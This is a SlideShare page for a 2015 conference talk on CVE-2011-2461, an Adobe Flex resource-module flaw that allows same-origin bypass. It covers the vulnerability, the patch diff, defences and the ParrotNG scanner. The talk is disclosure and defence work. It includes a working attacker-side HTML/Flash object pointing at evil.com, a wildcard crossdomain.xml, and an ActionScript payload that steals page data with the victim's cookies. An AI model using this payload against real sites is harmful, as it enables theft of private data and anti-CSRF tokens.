SlideShare a Scribd company logo
About Us
The old is new, again.
CVE-2011-2461 is back!
Troopers 2015
About Us
Luca “ikki” Carettoni
✓ Application Security @ LinkedIn
✓ Securing the Internet, one bug at a time™
✓ @_ikki
Mauro “sneak” Gentile
✓ Application Security @ Minded Security
✓ Security Researcher
✓ MSc in Computer Engineering
✓ @sneak_
The views and opinions expressed in
this presentation are those of the
authors and do not reflect the
position of our employers.
Also, our companies do not
endorse this research …bla bla
Agenda
■ Introduction
○ Adobe Flex Localization
○ Same-Origin Policy in Adobe plug-ins
■ Vulnerability analysis
○ Identification and Exploitation
■ Official patch analysis
○ Reversing the fix and busting the vulnerable code
○ How to defend
■ Scanning at scale
○ Identifying vulnerable SWF files
○ ParrotNG
○ Results and PoCs
How it started...
Introduction
■ Adobe Flex, read “Apache Flex” since 2011
○ Open source SDK for developing RIAs based on Adobe Flash
○ Provides a set of tools and classes to develop interactive apps
● UI layout designed through MXML
● ActionScript for dynamic features
○ It builds SWF files
● They run in browsers with Flash plug-in enabled
● Apps follow the same security rules as “native” Flash apps, at least for
content running in the browser
Flex Localization
■ Starting from Flex v3, apps support dynamic localization
○ Approach based on properties files
● Depending on the actual localeChain, the app modifies text labels and
images at run time
● Handy feature for easily localizing applications
/src/locales/en_US/resources.properties
app.name=Name
app.surname=Surname
/src/locales/it_IT/resources.properties
app.name=Nome
app.surname=Cognome
/src/App.mxml
[ . . . ]
<mx:FormItem label=" {resourceManager.
getString('resources','app.name')} ">
<s:TextInput />
</mx:FormItem>
[ . . . ]
Flex Localization (cont’d)
■ Two possibilities to localize Flex apps:
1. Compile the localization properties files directly in your
application
● The application SWF file includes both the app and the localization files
2. Compile the localization properties files separately, and let the
application load them at run time
● Each properties file is built in a SWF file, called Resource Module
● The application can load the required module at run-time
● Possibility to modify text labels without recompiling the entire project
Preloading resource modules
■ Resource pre-loading by passing FlashVars in the HTML
wrapper
○ resourceModuleURLs: “A comma-separated list of URLs from
which resource modules will be sequentially preloaded. Resource
modules are loaded by the same class as RSLs, but are loaded
after the RSLs. The URLs can be relative or absolute.”
<object width="100%" height="100%"
type="application/x-shockwave-flash"
data="http://victim.com/App.swf">
<param name="flashvars"
value=" resourceModuleURLs=English.swf ">
</object>
SOP in Adobe plug-ins
■ Flash applets have their security context derived from
the origin they are loaded from
○ Same-origin interaction is allowed
● Flash movie hosted at A.com can access data on A.com
○ Cross-origin interaction is not allowed unless the receiver domain
defines a cross-domain policy
● Flash movie hosted at A.com
can access data hosted on B.com if
and only if B defines its own
crossdomain.xml file
SOP in Adobe plug-ins (cont’d)
■ Flash applets can make HTTP requests with cookies
(and retrieve responses) to the domain they are loaded
from
○ Just think about Rosetta Flash: abusing JSONP handlers to
“interact” with domains reflecting alphanumeric callbacks
○ As we all know, letting people upload Flash movies leads to XSS
○ Common countermeasures
● Sandbox domains
● Content-Disposition: attachment
● but still, you should take into consideration polyglots...
What if...
■ Malicious web pages can ask Flex apps to load arbitrary
resource modules
■ The resource module can be loaded from arbitrary
domains as well...
CVE-2011-2461
Adobe marked it as XSS and released a tech note to verify the vulnerability and to
explain how to patch it.
CVE-2011-2461 (cont’d)
■ Resource modules inherit the security sandbox of the
caller SWF
○ External SWF file - loaded from arbitrary domains - can access
data hosted on the caller domain
■ Impact
○ By asking victims to visit a malicious web page, the vulnerability
allows attackers to steal victims’ data hosted on the vulnerable
SWF file’s origin
○ “Indirect” SOP bypass
<object width="100%" height="100%"
type="application/x-shockwave-flash"
data="http://victim.com/App.swf">
<param name="flashvars"
value="resourceModuleURLs=http://[arbitrary_evil_domain]/module.swf ">
</object>
Exploiting CVE-2011-2461
■ Exploitation scenarios
○ SORF: Same-Origin Request Forgery to steal anti-CSRF tokens and
private data
○ UI Redressing: override text labels by importing a valid resource
module, whose text is controlled by the attacker
○ XSS in older versions of Flash Player
● Logically similar to UXSS since the app itself does not need to be
vulnerable to XSS
● Not possible to pass resourceModuleURLs in querystring anymore
resourceModuleURLs as GET parameter
■ In current Flex version, resourceModuleURLs cannot be
declared from the querystring
○ Security enhancement or bug?
○ “Child SWFs or modules, including resource modules, that are
loaded at runtime sometimes fail to load when the SWF location is
specified as a URL parameter”
● See https://helpx.adobe.com/x-productkb/multi/loading-child-swfs-
runtime-sometimes.html
○ This limits significantly the impact of the vulnerability
● Unless the application uses a custom wrapper
SORF
■ Same-Origin Request Forgery attack flow
1. The vulnerable SWF file is forced to load an external
resource module which can “interact” with the domain the
SWF file is loaded from - due to the vulnerability
2. The resource module performs HTTP requests to steal
victim’s private data since cookies are automatically
appended
3. Finally, it “sends” stolen data to the attacker’s domain
SORF (sequence diagram)
■ Same-Origin Request Forgery
SORF (code on the attacker’s side)
<textarea id="x" style="width: 100%; height:50%"></textarea>
<object width="100%" height="100%"
type="application/x-shockwave-flash"
data="VULNERABLE_SWF">
<param name="allowscriptaccess" value="always">
<param name="flashvars" value="resourceModuleURLs=http://evil.com/URLr.swf?
url=TARGET_WEBPAGE">
</object>
<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
■ http://evil.com/test.html
■ http://evil.com/crossdomain.xml
VULNERABLE_SWF such as http://target.example.com/a.swf
TARGET_WEBPAGE such as http://target.example.com/creditcardinformation.php
■ A generic payload (http://evil.com/URLr.swf)
package {
import flash.display.Sprite;
...
public class URLr extends Sprite {
public static var app : URLr;
public function main():void {
app = new URLr();
}
public function URLr() {
var url:String = root.loaderInfo.parameters.url as String;
var loader:URLLoader = new URLLoader();
configureListeners(loader);
var request:URLRequest = new URLRequest(url);
...
private function completeHandler(event:Event):void {
var loader:URLLoader = URLLoader(event.target);
var res:String = escape(loader.data);
ExternalInterface.call("eval", "document.getElementById('x').value='" + res + "';document.
getElementById('x').value=unescape(document.getElementById('x').value)");
}
}
}
SORF (code on the attacker’s side)
About Us
DEMO 1
Exploiting CVE-2011-2461
Analysing the patch
“It’s necessary to patch the
applications to protect user
data.”
Analysing the patch (cont’d)
■ Anything unusual?
○ Well, the patch does not affect the Adobe Flash Player but the
Flex framework modules
○ Therefore developers are asked to patch their apps or
recompile them through a non-vulnerable version of the Flex
SDK
■ Adobe provided a reliable tool for identifying whether
SWF files are vulnerable or not
○ It is able to patch compiled applications w/o recompiling
○ Very useful, also in the case of missing sources
Testing patched applications
■ After the patch, resource modules do not inherit the
embedding SWF’s origin anymore
○ Resource modules can be loaded exclusively from the same-
origin
○ Although this may look very clear at this point, we needed to
reverse the patch to make sure we really got the point
○ During our preliminary analysis, we noticed some
inconsistencies:
■ i.e. some apps were correctly loading x-domain SWF modules, whereas
some others were not
Busting the vulnerable code
■ Adopted methodology
1. We took two versions of the same Flex application sample
The first one vulnerable, whereas the second one patched by the Adobe patch
tool.
2. We decompiled the two samples and diffed them
3. Analyzing the code diff we were able to understand both the
vulnerable ActionScript code and the patch
■ In the end, we proved that our hypothesis regarding
security sandbox inheritance was indeed correct
Vulnerable vs patched
Vulnerable SWF
class ModuleInfo
public function load(applicationDomain:
ApplicationDomain = null,
securityDomain:SecurityDomain = null) : void {
if(_loaded)
{
return;
}
_loaded = true;
limbo = null;
if(_url.indexOf("published://") == 0)
{
return;
}
var r:URLRequest = new URLRequest(_url);
var c:LoaderContext = new LoaderContext();
c.applicationDomain = applicationDomain?
applicationDomain:new
ApplicationDomain(ApplicationDomain.
currentDomain);
c.securityDomain = securityDomain;
if(securityDomain == null && Security.
sandboxType ==
Security.REMOTE)
{
c.securityDomain = SecurityDomain.
currentDomain;
}
loader = new Loader();
Patched SWF
class ModuleInfo
public function load(applicationDomain:
ApplicationDomain = null,
securityDomain:SecurityDomain = null) : void {
if(_loaded)
{
return;
}
_loaded = true;
limbo = null;
if(_url.indexOf("published://") == 0)
{
return;
}
var r:URLRequest = new URLRequest(_url);
var c:LoaderContext = new LoaderContext();
c.applicationDomain = applicationDomain?
applicationDomain:new
ApplicationDomain(ApplicationDomain.
currentDomain);
c.securityDomain = securityDomain;
if(securityDomain == null && false == true)
{
c.securityDomain = SecurityDomain.
currentDomain;
}
loader = new Loader();
How to protect
■ Three options:
1. Recompile vulnerable SWF files with the latest Apache Flex
SDK, including static libraries
2. Patch them with the official Adobe patch tool, as illustrated
in the official Tech Note. This seems to be sufficiently
reliable, at least in our experience
3. Delete them, if not used anymore
Bonus suggestion:
1. Use strict cross-domain policy files
2. Do not relax it!
Recap
■ We had a cool bug, but it turned out to be a 1-day
■ CVE-2011-2461 was patched in the Flex SDK
○ Vulnerable SWF files can still be exploited in fully patched web
browsers with the latest Flash plug-in
■ No technical details about exploitation were published
■ Successful exploits would lead to indirect SOP bypass,
data stealing and actions forging
So, what’s next?
Any chance to catch vulnerable
real-world Flex applications
after 4 years?
Automating vulnerability detection
1. Identify vulnerable SWF files in a programmatic
fashion
2. Build a tool
a. ParrotNG
3. Scan the Internet
a. Find Subdomains + Your Favourite Search Engine +
Selenium + ParrotNG
b. Repeat (3a) with multiple computers and wait
ABC Inspection
1. Identify a heuristic to distinguish whether a given SWF file is
vulnerable or not
a. Flex applications only
b. Empirically conducted by comparing different versions of the same
Flex application sample and focusing on the ModuleInfo:::load method
c. Identified patterns in the ActionScript Bytecode (ABC) to uncover the
vulnerability
ParrotNG
■ Automatic tool to identify vulnerable SWF files
○ Written in Java
○ One JAR, Two flavors
● Command line utility
● Burp Pro Passive Scanner plugin
○ It uses swfdump - a tool included in Flex framework - for
disassembling SWF files
○ Open-source
○ Download the src from https://github.com/ikkisoft/ParrotNG
ParrotNG Command Line
ParrotNG Burp Plugin
About Us
DEMO 2
Using ParrotNG
ParrotNG at scale
● Between October and December 2014, we scanned a few
interesting domains for detecting vulnerable SWF files:
○ Top 50 Alexa
○ Adobe.com
○ Sites with bug bounty programs
● We broke the Internet with a four years old vulnerability that was
never fully understood, and never surfaced
...and many others
*All trademarks and logos belong to their respective owners
About Us
DEMO 3
Stealing SSO tokens
Coordinated responsible disclosure
■ We reported the vulnerability to many high-profile
security teams
○ Providing specific PoCs, ParrotNG, and a PDF with the research
■ Parties were informed on a potential disclosure date
○ Based on their feedback, we identified an appropriate
disclosure date
■ There are still many more websites that are hosting
vulnerable SWF files
○ Troopers is about making the world a safer place
○ We need your help and be ethical!
Thanks
References
Localization in Flex - Part 1: Compiling resources into an application - Adobe
http://www.adobe.com/devnet/flex/articles/flex_localization_pt1.html
Localization in Flex - Part 2: Loading resources at runtime - Adobe
http://www.adobe.com/devnet/flex/articles/flex-localization-pt2.html
Using resource modules - Adobe
http://help.adobe.com/en_US/Flex/4.0/UsingSDK/WS2db454920e96a9e51e63e3d11c0bf69084-
7f3c.html
Same-origin Policy for Flash (Browser Security Handbook - part 2) - Michal Zalewski
https://code.google.com/p/browsersec/wiki/Part2#Same-origin_policy_for_Flash
The Tangled Web - Michal Zalewski
http://lcamtuf.coredump.cx/tangled/
Flash content and the same-origin policy - Peleus Uhley
http://blogs.adobe.com/security/2009/11/flash_content_and_the_same-ori.html
Same Origin Policy Weaknesses - kuza55
http://www.slideshare.net/kuza55/same-origin-policy-weaknesses-1728474
Testing Flash Applications - Stefano Di Paola
http://www.wisec.it/en/Docs/flash_App_testing_Owasp07.pdf
Loading child SWFs at runtime sometimes fails - Adobe
https://helpx.adobe.com/x-productkb/multi/loading-child-swfs-runtime-sometimes.html
HTTP: Adobe Flash Player resourceModuleURLs signature - Juniper Networks
http://signatures.juniper.net/documentation/signatures/HTTP%3ASTC%3ASWF%
3ARESOURCEMODULEURLS.html
Security update available for Flex SDK - Adobe
https://www.adobe.com/support/security/bulletins/apsb11-25.html
Flex Security Issue APSB11-25 - Adobe
https://helpx.adobe.com/flash-builder/kb/flex-security-issue-apsb11-25.html
Polyglot payloads in practice - Mathias Karlsson
http://www.slideshare.net/MathiasKarlsson2/polyglot-payloads-in-practice-by-avlidienbrunn-at-
hackpra
References
Crossing Origins by Crossing Formats - Jonas Magazinius, Andrei Sabelfeld, Billy K. Rios
https://www.owasp.org/images/8/85/Crossing.Origins.by.Crossing.Formats-Jonas.
Magazinius-OWASP-131010.pptx
Disassembling a SWF with swfdump - Gordon Smith
http://blogs.adobe.com/gosmith/2008/02/disassembling_a_swf_with_swfdu_1.html
Abusing JSONP with Rosetta Flash - Michele Spagnuolo
https://miki.it/blog/2014/7/8/abusing-jsonp-with-rosetta-flash/
<object> tag and Flash file executing JavaScript - HTML5 Security Cheatsheet
https://html5sec.org/#79
Warning: OBJECT and EMBED are inherently unsafe - Michal Zalewski
http://lcamtuf.blogspot.it/2011/03/warning-object-and-embed-are-inherently.html
Origin Policy Enforcement in Modern Browsers - Frederick Braun
https://frederik-braun.com/publications/thesis/Thesis-
Origin_Policy_Enforcement_in_Modern_Browsers.pdf
Thank you all - you made this possible!
References
Images
In random order:
http://fc05.deviantart.net/fs70/f/2013/028/9/e/walfas_custom_props___popeye_s_spinach_by_grayfox5000-d5t3xf4.png
http://www.senocular.com/pub/adobe/Flash%20Player%20Security%20Basics_files/crossdomain-text.png
http://bloximages.chicago2.vip.townnews.com/thesouthern.com/content/tncms/assets/v3/editorial/1/6d/16d5e70c-9092-
11e2-8e9f-0019bb2963f4/51485cb2b3ab8.preview-620.jpg
https://dambreaker.files.wordpress.com/2011/12/man_thinking.jpg
http://www.clipartlord.com/wp-content/uploads/2013/06/parrot.png
http://www.siafitalia.it/wp-content/uploads/2015/02/Italia_Bandiera.jpg.png

More Related Content

What's hot

Java Deserialization Vulnerabilities - The Forgotten Bug Class
Java Deserialization Vulnerabilities - The Forgotten Bug ClassJava Deserialization Vulnerabilities - The Forgotten Bug Class
Java Deserialization Vulnerabilities - The Forgotten Bug Class
CODE WHITE GmbH
 
An Overview of Deserialization Vulnerabilities in the Java Virtual Machine (J...
An Overview of Deserialization Vulnerabilities in the Java Virtual Machine (J...An Overview of Deserialization Vulnerabilities in the Java Virtual Machine (J...
An Overview of Deserialization Vulnerabilities in the Java Virtual Machine (J...
joaomatosf_
 
Deserialization vulnerabilities
Deserialization vulnerabilitiesDeserialization vulnerabilities
Deserialization vulnerabilities
GreenD0g
 
Serial Killer - Silently Pwning your Java Endpoints // OWASP BeNeLux Day 2016
Serial Killer - Silently Pwning your Java Endpoints // OWASP BeNeLux Day 2016Serial Killer - Silently Pwning your Java Endpoints // OWASP BeNeLux Day 2016
Serial Killer - Silently Pwning your Java Endpoints // OWASP BeNeLux Day 2016
Christian Schneider
 
Black Hat EU 2010 - Attacking Java Serialized Communication
Black Hat EU 2010 - Attacking Java Serialized CommunicationBlack Hat EU 2010 - Attacking Java Serialized Communication
Black Hat EU 2010 - Attacking Java Serialized Communication
msaindane
 
SyScan 2016 - Remote code execution via Java native deserialization
SyScan 2016 - Remote code execution via Java native deserializationSyScan 2016 - Remote code execution via Java native deserialization
SyScan 2016 - Remote code execution via Java native deserialization
David Jorm
 
Resting on your laurels will get you powned
Resting on your laurels will get you pownedResting on your laurels will get you powned
Resting on your laurels will get you powned
Dinis Cruz
 
Finding and exploiting novel flaws in Java software (SyScan 2015)
Finding and exploiting novel flaws in Java software (SyScan 2015)Finding and exploiting novel flaws in Java software (SyScan 2015)
Finding and exploiting novel flaws in Java software (SyScan 2015)
David Jorm
 
Security DevOps - Wie Sie in agilen Projekten trotzdem sicher bleiben // DevO...
Security DevOps - Wie Sie in agilen Projekten trotzdem sicher bleiben // DevO...Security DevOps - Wie Sie in agilen Projekten trotzdem sicher bleiben // DevO...
Security DevOps - Wie Sie in agilen Projekten trotzdem sicher bleiben // DevO...
Christian Schneider
 
Asfws 2014 slides why .net needs ma-cs and other serial(-ization) tales_v2.0
Asfws 2014 slides why .net needs ma-cs and other serial(-ization) tales_v2.0Asfws 2014 slides why .net needs ma-cs and other serial(-ization) tales_v2.0
Asfws 2014 slides why .net needs ma-cs and other serial(-ization) tales_v2.0
Cyber Security Alliance
 
Adventures in Asymmetric Warfare
Adventures in Asymmetric WarfareAdventures in Asymmetric Warfare
Adventures in Asymmetric Warfare
Will Schroeder
 
Flash it baby!
Flash it baby!Flash it baby!
Flash it baby!
Soroush Dalili
 
Java Exploit Analysis .
Java Exploit Analysis .Java Exploit Analysis .
Java Exploit Analysis .
Rahul Sasi
 
No locked doors, no windows barred: hacking OpenAM infrastructure
No locked doors, no windows barred: hacking OpenAM infrastructureNo locked doors, no windows barred: hacking OpenAM infrastructure
No locked doors, no windows barred: hacking OpenAM infrastructure
Andrew Petukhov
 
Pwnstaller
PwnstallerPwnstaller
Pwnstaller
Will Schroeder
 
BH Arsenal '14 TurboTalk: The Veil-framework
BH Arsenal '14 TurboTalk: The Veil-frameworkBH Arsenal '14 TurboTalk: The Veil-framework
BH Arsenal '14 TurboTalk: The Veil-framework
VeilFramework
 
Ruxmon cve 2012-2661
Ruxmon cve 2012-2661Ruxmon cve 2012-2661
Ruxmon cve 2012-2661
snyff
 
Ruxmon feb 2013 what happened to rails
Ruxmon feb 2013   what happened to railsRuxmon feb 2013   what happened to rails
Ruxmon feb 2013 what happened to rails
snyff
 
Breaking .net through serialization
Breaking .net through serializationBreaking .net through serialization
Breaking .net through serialization
Net Drive
 
I Hunt Sys Admins
I Hunt Sys AdminsI Hunt Sys Admins
I Hunt Sys Admins
Will Schroeder
 

What's hot (20)

Java Deserialization Vulnerabilities - The Forgotten Bug Class
Java Deserialization Vulnerabilities - The Forgotten Bug ClassJava Deserialization Vulnerabilities - The Forgotten Bug Class
Java Deserialization Vulnerabilities - The Forgotten Bug Class
 
An Overview of Deserialization Vulnerabilities in the Java Virtual Machine (J...
An Overview of Deserialization Vulnerabilities in the Java Virtual Machine (J...An Overview of Deserialization Vulnerabilities in the Java Virtual Machine (J...
An Overview of Deserialization Vulnerabilities in the Java Virtual Machine (J...
 
Deserialization vulnerabilities
Deserialization vulnerabilitiesDeserialization vulnerabilities
Deserialization vulnerabilities
 
Serial Killer - Silently Pwning your Java Endpoints // OWASP BeNeLux Day 2016
Serial Killer - Silently Pwning your Java Endpoints // OWASP BeNeLux Day 2016Serial Killer - Silently Pwning your Java Endpoints // OWASP BeNeLux Day 2016
Serial Killer - Silently Pwning your Java Endpoints // OWASP BeNeLux Day 2016
 
Black Hat EU 2010 - Attacking Java Serialized Communication
Black Hat EU 2010 - Attacking Java Serialized CommunicationBlack Hat EU 2010 - Attacking Java Serialized Communication
Black Hat EU 2010 - Attacking Java Serialized Communication
 
SyScan 2016 - Remote code execution via Java native deserialization
SyScan 2016 - Remote code execution via Java native deserializationSyScan 2016 - Remote code execution via Java native deserialization
SyScan 2016 - Remote code execution via Java native deserialization
 
Resting on your laurels will get you powned
Resting on your laurels will get you pownedResting on your laurels will get you powned
Resting on your laurels will get you powned
 
Finding and exploiting novel flaws in Java software (SyScan 2015)
Finding and exploiting novel flaws in Java software (SyScan 2015)Finding and exploiting novel flaws in Java software (SyScan 2015)
Finding and exploiting novel flaws in Java software (SyScan 2015)
 
Security DevOps - Wie Sie in agilen Projekten trotzdem sicher bleiben // DevO...
Security DevOps - Wie Sie in agilen Projekten trotzdem sicher bleiben // DevO...Security DevOps - Wie Sie in agilen Projekten trotzdem sicher bleiben // DevO...
Security DevOps - Wie Sie in agilen Projekten trotzdem sicher bleiben // DevO...
 
Asfws 2014 slides why .net needs ma-cs and other serial(-ization) tales_v2.0
Asfws 2014 slides why .net needs ma-cs and other serial(-ization) tales_v2.0Asfws 2014 slides why .net needs ma-cs and other serial(-ization) tales_v2.0
Asfws 2014 slides why .net needs ma-cs and other serial(-ization) tales_v2.0
 
Adventures in Asymmetric Warfare
Adventures in Asymmetric WarfareAdventures in Asymmetric Warfare
Adventures in Asymmetric Warfare
 
Flash it baby!
Flash it baby!Flash it baby!
Flash it baby!
 
Java Exploit Analysis .
Java Exploit Analysis .Java Exploit Analysis .
Java Exploit Analysis .
 
No locked doors, no windows barred: hacking OpenAM infrastructure
No locked doors, no windows barred: hacking OpenAM infrastructureNo locked doors, no windows barred: hacking OpenAM infrastructure
No locked doors, no windows barred: hacking OpenAM infrastructure
 
Pwnstaller
PwnstallerPwnstaller
Pwnstaller
 
BH Arsenal '14 TurboTalk: The Veil-framework
BH Arsenal '14 TurboTalk: The Veil-frameworkBH Arsenal '14 TurboTalk: The Veil-framework
BH Arsenal '14 TurboTalk: The Veil-framework
 
Ruxmon cve 2012-2661
Ruxmon cve 2012-2661Ruxmon cve 2012-2661
Ruxmon cve 2012-2661
 
Ruxmon feb 2013 what happened to rails
Ruxmon feb 2013   what happened to railsRuxmon feb 2013   what happened to rails
Ruxmon feb 2013 what happened to rails
 
Breaking .net through serialization
Breaking .net through serializationBreaking .net through serialization
Breaking .net through serialization
 
I Hunt Sys Admins
I Hunt Sys AdminsI Hunt Sys Admins
I Hunt Sys Admins
 

Viewers also liked

Comparing DOM XSS Tools On Real World Bug
Comparing DOM XSS Tools On Real World BugComparing DOM XSS Tools On Real World Bug
Comparing DOM XSS Tools On Real World Bug
Stefano Di Paola
 
Concrete5 Sendmail RCE Advisory
Concrete5 Sendmail RCE AdvisoryConcrete5 Sendmail RCE Advisory
Concrete5 Sendmail RCE Advisory
Minded Security
 
Concrete5 Multiple Reflected XSS Advisory
Concrete5 Multiple Reflected XSS AdvisoryConcrete5 Multiple Reflected XSS Advisory
Concrete5 Multiple Reflected XSS Advisory
Minded Security
 
iOS Masque Attack
iOS Masque AttackiOS Masque Attack
iOS Masque Attack
Minded Security
 
Linkedin.com DomXss 04-08-2014
Linkedin.com DomXss 04-08-2014Linkedin.com DomXss 04-08-2014
Linkedin.com DomXss 04-08-2014
Giorgio Fedon
 
Social Engineering the Windows Kernel by James Forshaw
Social Engineering the Windows Kernel by James ForshawSocial Engineering the Windows Kernel by James Forshaw
Social Engineering the Windows Kernel by James Forshaw
Shakacon
 
Una imatge,una emoció
Una imatge,una emocióUna imatge,una emoció
Una imatge,una emoció
Maribel Alarcón
 
Chema Alonso - Dorking, Pentesting & Hacking con Android Apps [rootedvlc2]
Chema Alonso - Dorking, Pentesting & Hacking con Android Apps [rootedvlc2]Chema Alonso - Dorking, Pentesting & Hacking con Android Apps [rootedvlc2]
Chema Alonso - Dorking, Pentesting & Hacking con Android Apps [rootedvlc2]
RootedCON
 
Windows Memory Forensic Analysis using EnCase
Windows Memory Forensic Analysis using EnCaseWindows Memory Forensic Analysis using EnCase
Windows Memory Forensic Analysis using EnCase
Takahiro Haruyama
 
Null 11 june_Malware CNC: Advance Evasion techniques_by Avkash k and dhawal shah
Null 11 june_Malware CNC: Advance Evasion techniques_by Avkash k and dhawal shahNull 11 june_Malware CNC: Advance Evasion techniques_by Avkash k and dhawal shah
Null 11 june_Malware CNC: Advance Evasion techniques_by Avkash k and dhawal shah
nullowaspmumbai
 
Static analysis for security
Static analysis for securityStatic analysis for security
Static analysis for security
Fadi Abdulwahab
 
La lectura a l'escola
La lectura a l'escolaLa lectura a l'escola
La lectura a l'escola
Maribel Alarcón
 
Introduction to burp suite
Introduction to burp suiteIntroduction to burp suite
Introduction to burp suite
Utkarsh Bhargava
 
Segurança no Desenvolvimento de App`s
Segurança no Desenvolvimento de App`sSegurança no Desenvolvimento de App`s
Segurança no Desenvolvimento de App`s
Onyo
 
Eric Lafortune - ProGuard: Optimizer and obfuscator in the Android SDK
Eric Lafortune - ProGuard: Optimizer and obfuscator in the Android SDKEric Lafortune - ProGuard: Optimizer and obfuscator in the Android SDK
Eric Lafortune - ProGuard: Optimizer and obfuscator in the Android SDK
GuardSquare
 
OWASP Zed Attack Proxy
OWASP Zed Attack ProxyOWASP Zed Attack Proxy
OWASP Zed Attack Proxy
Fadi Abdulwahab
 
Webinar: Ransomware - Five Reasons You’re Not As Protected As You Think
Webinar: Ransomware - Five Reasons You’re Not As Protected As You ThinkWebinar: Ransomware - Five Reasons You’re Not As Protected As You Think
Webinar: Ransomware - Five Reasons You’re Not As Protected As You Think
Storage Switzerland
 
Using Massively Distributed Malware in APT-Style Attacks
Using Massively Distributed Malware in APT-Style AttacksUsing Massively Distributed Malware in APT-Style Attacks
Using Massively Distributed Malware in APT-Style Attacks
IBM Security
 
Base64 Encoding
Base64 EncodingBase64 Encoding
Base64 Encoding
Jonathan Francis Roscoe
 
Scénarios d'exploitation Metasploit - FR : Scénario 1
Scénarios d'exploitation Metasploit - FR : Scénario 1Scénarios d'exploitation Metasploit - FR : Scénario 1
Scénarios d'exploitation Metasploit - FR : Scénario 1
Eric Romang
 

Viewers also liked (20)

Comparing DOM XSS Tools On Real World Bug
Comparing DOM XSS Tools On Real World BugComparing DOM XSS Tools On Real World Bug
Comparing DOM XSS Tools On Real World Bug
 
Concrete5 Sendmail RCE Advisory
Concrete5 Sendmail RCE AdvisoryConcrete5 Sendmail RCE Advisory
Concrete5 Sendmail RCE Advisory
 
Concrete5 Multiple Reflected XSS Advisory
Concrete5 Multiple Reflected XSS AdvisoryConcrete5 Multiple Reflected XSS Advisory
Concrete5 Multiple Reflected XSS Advisory
 
iOS Masque Attack
iOS Masque AttackiOS Masque Attack
iOS Masque Attack
 
Linkedin.com DomXss 04-08-2014
Linkedin.com DomXss 04-08-2014Linkedin.com DomXss 04-08-2014
Linkedin.com DomXss 04-08-2014
 
Social Engineering the Windows Kernel by James Forshaw
Social Engineering the Windows Kernel by James ForshawSocial Engineering the Windows Kernel by James Forshaw
Social Engineering the Windows Kernel by James Forshaw
 
Una imatge,una emoció
Una imatge,una emocióUna imatge,una emoció
Una imatge,una emoció
 
Chema Alonso - Dorking, Pentesting & Hacking con Android Apps [rootedvlc2]
Chema Alonso - Dorking, Pentesting & Hacking con Android Apps [rootedvlc2]Chema Alonso - Dorking, Pentesting & Hacking con Android Apps [rootedvlc2]
Chema Alonso - Dorking, Pentesting & Hacking con Android Apps [rootedvlc2]
 
Windows Memory Forensic Analysis using EnCase
Windows Memory Forensic Analysis using EnCaseWindows Memory Forensic Analysis using EnCase
Windows Memory Forensic Analysis using EnCase
 
Null 11 june_Malware CNC: Advance Evasion techniques_by Avkash k and dhawal shah
Null 11 june_Malware CNC: Advance Evasion techniques_by Avkash k and dhawal shahNull 11 june_Malware CNC: Advance Evasion techniques_by Avkash k and dhawal shah
Null 11 june_Malware CNC: Advance Evasion techniques_by Avkash k and dhawal shah
 
Static analysis for security
Static analysis for securityStatic analysis for security
Static analysis for security
 
La lectura a l'escola
La lectura a l'escolaLa lectura a l'escola
La lectura a l'escola
 
Introduction to burp suite
Introduction to burp suiteIntroduction to burp suite
Introduction to burp suite
 
Segurança no Desenvolvimento de App`s
Segurança no Desenvolvimento de App`sSegurança no Desenvolvimento de App`s
Segurança no Desenvolvimento de App`s
 
Eric Lafortune - ProGuard: Optimizer and obfuscator in the Android SDK
Eric Lafortune - ProGuard: Optimizer and obfuscator in the Android SDKEric Lafortune - ProGuard: Optimizer and obfuscator in the Android SDK
Eric Lafortune - ProGuard: Optimizer and obfuscator in the Android SDK
 
OWASP Zed Attack Proxy
OWASP Zed Attack ProxyOWASP Zed Attack Proxy
OWASP Zed Attack Proxy
 
Webinar: Ransomware - Five Reasons You’re Not As Protected As You Think
Webinar: Ransomware - Five Reasons You’re Not As Protected As You ThinkWebinar: Ransomware - Five Reasons You’re Not As Protected As You Think
Webinar: Ransomware - Five Reasons You’re Not As Protected As You Think
 
Using Massively Distributed Malware in APT-Style Attacks
Using Massively Distributed Malware in APT-Style AttacksUsing Massively Distributed Malware in APT-Style Attacks
Using Massively Distributed Malware in APT-Style Attacks
 
Base64 Encoding
Base64 EncodingBase64 Encoding
Base64 Encoding
 
Scénarios d'exploitation Metasploit - FR : Scénario 1
Scénarios d'exploitation Metasploit - FR : Scénario 1Scénarios d'exploitation Metasploit - FR : Scénario 1
Scénarios d'exploitation Metasploit - FR : Scénario 1
 

Similar to The old is new, again. CVE-2011-2461 is back!

Apache cordova
Apache cordovaApache cordova
Apache cordova
Carlo Bernaschina
 
iOS Application Penetration Testing for Beginners
iOS Application Penetration Testing for BeginnersiOS Application Penetration Testing for Beginners
iOS Application Penetration Testing for Beginners
RyanISI
 
Native apps in html5 with chrome packaged apps
Native apps in html5 with chrome packaged appsNative apps in html5 with chrome packaged apps
Native apps in html5 with chrome packaged apps
Tom Wilson
 
Wonderful World of Maven
Wonderful World of MavenWonderful World of Maven
Wonderful World of Maven
Justin J. Moses
 
MSHTMHell.pptx
MSHTMHell.pptxMSHTMHell.pptx
MSHTMHell.pptx
AustinMartin53
 
Vulnex app secusa2013
Vulnex app secusa2013Vulnex app secusa2013
Vulnex app secusa2013
drewz lin
 
The State of the Veil Framework
The State of the Veil FrameworkThe State of the Veil Framework
The State of the Veil Framework
VeilFramework
 
Hacking The World With Flash
Hacking The World With FlashHacking The World With Flash
Hacking The World With Flash
joepangus
 
What is the Secure Supply Chain and the Current State of the PHP Ecosystem
What is the Secure Supply Chain and the Current State of the PHP EcosystemWhat is the Secure Supply Chain and the Current State of the PHP Ecosystem
What is the Secure Supply Chain and the Current State of the PHP Ecosystem
sparkfabrik
 
[2015/2016] Apache Cordova
[2015/2016] Apache Cordova[2015/2016] Apache Cordova
[2015/2016] Apache Cordova
Ivano Malavolta
 
Reversing & malware analysis training part 10 exploit development basics
Reversing & malware analysis training part 10   exploit development basicsReversing & malware analysis training part 10   exploit development basics
Reversing & malware analysis training part 10 exploit development basics
Abdulrahman Bassam
 
Client side attacks using PowerShell
Client side attacks using PowerShellClient side attacks using PowerShell
Client side attacks using PowerShell
Nikhil Mittal
 
Cross Domain Hijacking - File Upload Vulnerability
Cross Domain Hijacking - File Upload VulnerabilityCross Domain Hijacking - File Upload Vulnerability
Cross Domain Hijacking - File Upload Vulnerability
Ronan Dunne, CEH, SSCP
 
VoxxedDays Luxembourg - Abuse web browsers for fun & profits - Dominique Righ...
